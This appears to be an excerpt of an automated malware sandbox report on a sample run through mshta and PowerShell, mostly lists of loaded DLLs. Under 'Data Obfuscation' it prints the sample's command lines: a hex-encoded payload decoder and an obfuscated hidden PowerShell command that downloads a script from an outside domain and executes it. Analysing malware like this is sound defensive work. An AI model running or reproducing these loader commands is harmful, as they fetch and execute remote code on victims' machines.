Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000006.00000002.2182040392.0000000000821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb+ source: powershell.exe, 00000006.00000002.2214556917.0000000006C9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb7 source: powershell.exe, 00000006.00000002.2214673362.0000000006CD3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbpV source: powershell.exe, 00000006.00000002.2182040392.00000000007B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb) source: powershell.exe, 00000006.00000002.2182040392.0000000000821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb. source: powershell.exe, 00000006.00000002.2213256401.0000000006C10000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3DJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0076C0FB pushfd ; iretd 6_2_0076C109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0076C0D0 pushad ; iretd 6_2_0076C0F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0076A343 push esp; retf 6_2_0076A321
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0076A313 push esp; retf 6_2_0076A321
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00769543 pushfd ; iretd 6_2_0076954A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00769A50 push A9F807D0h; iretd 6_2_00769A5E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00769AD1 push A9E007D0h; iretd 6_2_00769AFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00769B20 push AA0807D0h; iretd 6_2_00769C06
